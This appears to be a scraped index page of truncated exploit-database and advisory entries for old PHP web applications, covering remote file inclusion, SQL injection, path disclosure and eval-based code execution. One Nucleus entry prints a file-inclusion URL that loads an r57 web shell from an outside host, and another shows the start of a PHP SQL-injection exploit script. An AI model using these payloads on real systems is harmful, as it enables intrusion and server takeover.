Unfixed XSS vulnerability at phpxmlrpc.sourceforge.net
Security researcher lljkrieg submitted a cross-site scripting (XSS) vulnerability affecting phpxmlrpc.sourceforge.net on 16/05/2011; at the time of submission the site ranked 154 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 11/12/2011. It is...
Nucleus v3.61 Multiple Remote File Include
Exploit for php platform in category web applications Nucleus v3.61 === Multiple Remote File Include By n0n0x Homepage: http://priasantai.uni.cc/ Download script :http://sourceforge.net/projects/nucleuscms/ ========================================= nucleus3.61/action.php?DIRLIBS=y0ur g4y...
Nucleus 3.61 - Multiple Remote File Inclusions
Nucleus 3.61 - Multiple Remote File Inclusions Nucleus v3.61 === Multiple Remote File Include By n0n0x Homepage: http://priasantai.uni.cc/ Download script :http://sourceforge.net/projects/nucleuscms/ ========================================= nucleus3.61/action.php?DIRLIBS=y0ur g4y...
FreeBSD Ports: lifetype
The remote host is missing an update to the system as announced in the referenced advisory. VID 116b0820-d59c-11da-8098-00123ffe8333 OpenVAS Vulnerability Test $ Description: Auto generated from vuxml or freebsd advisories Authors: Thomas Reinke Copyright: Copyright (c) 2008 E-Soft Inc...
BLOG:CMS 4.2.1.c (DIR_PLUGINS) Multiple Remote File Include
Name : BLOG:CMS 4.2.1.c (DIR_PLUGINS) Multiple Remote File Include Download From : http://dfn.dl.sourceforge.net/sourceforge/blogcms/blogcms.4.2.1.c.7z Or Here http://blogcms.com Found By : RoMaNcYxHaCkEr We Are H-T TeaM Houssamix - ToXiC Home Page : Not Yet : Tryag.cc/cc No-Hack.net V99x.com/vb...
Design/Logic Flaw
PsychoStats 3.0.6b and earlier allows remote attackers to obtain sensitive information via a request for server.php with a missing or invalid newtheme parameter, which reveals a path in an error message...
PsychoStats 2.3 - 'Server.php' Full Path Disclosure
source: https://www.securityfocus.com/bid/24039/info PsychoStats is prone to a path-disclosure issue when invalid data is submitted. Exploiting this issue can allow an attacker to access sensitive data that may be used to launch further attacks against a vulnerable computer. PsychoStats 3.0.6b an...
PsychoStats 2.3 - Server.php Full Path Disclosure
PsychoStats 2.3 - Server.php Full Path Disclosure source: https://www.securityfocus.com/bid/24039/info PsychoStats is prone to a path-disclosure issue when invalid data is submitted. Exploiting this issue can allow an attacker to access sensitive data that may be used to launch further attacks...
Mambo Component Security Images 3.0.5 - Remote File Inclusion
Mambo Component Security Images 3.0.5 - Remote File Inclusion http://forge.joomla.org/sf/projects/comsecurityimages Marckusbest is the Best lamah of irc, fuck you comsecurityimages Mambo Remote File Include ------------------------------------------------------------------------------------ Bug...
Mambo Security Images Component <= 3.0.5 Inclusion Vulnerabilities
No description provided by source. http://forge.joomla.org/sf/projects/comsecurityimages Marckusbest is the Best lamah of irc, fuck you comsecurityimages Mambo Remote File Include ------------------------------------------------------------------------------------ Bug Found by: Drago84 greetz:...
file include exploits in nucleus 3.23
Multiple file include exploits in nucleus 3.23 script type : nucleus 3.23 bug found by : sweet-devil team : site-down type : file include exploits : action.php http://www.example.com/path/action.php?DIRLIBS=http://yoursite/r57shell.txt? media.php...
Bytehoard 2.1 - server.php Remote File Inclusion
Bytehoard 2.1 - server.php Remote File Inclusion Script: Bytehoard 2.1 Epsilon/Delta www.bytehoard.org Discovered: beford File: ./bytehoard/includes/webdav/server.php Vuln: Remote File Include. Code: require_once $bhconfig['bhfilepath']."/includes/webdav/parsepropfind.php";...
Bytehoard 2.1 (server.php) Remote File Include Vulnerability
Exploit for unknown platform in category web applications ============================================================ Bytehoard 2.1 server.php Remote File Include Vulnerability ============================================================ Script: Bytehoard 2.1 Epsilon/Delta www.bytehoard.org...
FreeBSD : lifetype -- ADOdb 'server.php' Insecure Test Script Security Issue (116b0820-d59c-11da-8098-00123ffe8333)
Secunia reports : A security issue has been discovered in LifeType, which can be exploited by malicious people to execute arbitrary SQL code and potentially compromise a vulnerable system. The problem is caused due to the presence of the insecure 'server.php' test script. %NASLMINLEVEL 70300 C...
FreeBSD : cacti -- ADOdb 'server.php' Insecure Test Script Security Issue (79c1154d-d5a5-11da-8098-00123ffe8333)
Secunia reports : Cacti have a security issue, which can be exploited by malicious people to execute arbitrary SQL code and potentially compromise a vulnerable system. The problem is caused due to the presence of the insecure 'server.php' test script. %NASLMINLEVEL 70300 C Tenable Network Securit...
lifetype -- ADOdb "server.php" Insecure Test Script Security Issue
Secunia reports: A security issue has been discovered in LifeType, which can be exploited by malicious people to execute arbitrary SQL code and potentially compromise a vulnerable system. The problem is caused due to the presence of the insecure "server.php" test script...
[SA19563] MAXdev MD-Pro ADOdb "server.php" Insecure Test Script Security Issue
TITLE: MAXdev MD-Pro ADOdb "server.php" Insecure Test Script Security Issue SECUNIA ADVISORY ID: SA19563 VERIFY ADVISORY: http://secunia.com/advisories/19563/ CRITICAL: Moderately critical IMPACT: Security Bypass, System access WHERE: From remote SOFTWARE: MAXdev MD-Pro 1.x...
ADODB 4.70 (PHPOpenChat 3.0.x) - Server.php SQL Injection
ADODB 4.70 PHPOpenChat 3.0.x - Server.php SQL Injection !/usr/bin/php -q -d shortopentag=on ? echo "PhpOpenChat 3.0.x ADODB Server.php "sql" SQL injection\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; echo "dork: Welcome to your...
ADODB < 4.70 (PhpOpenChat 3.0.x) Server.php SQL Injection Exploit
Exploit for unknown platform in category web applications ================================================================= ADODB 4.70 PhpOpenChat 3.0.x Server.php SQL Injection Exploit ================================================================= !/usr/bin/php -q -d shortopentag=on ? echo...
phpRPC Library rpc_decoder.php decode() Function Arbitrary Code Execution
The remote host has installed on it the phpRPC library, an xmlrpc library written in PHP and bundled with applications such as RunCMS and exoops. The version of phpRPC on the remote host fails to sanitize user input to the 'server.php' script before using it in an 'eval' function, which may allow...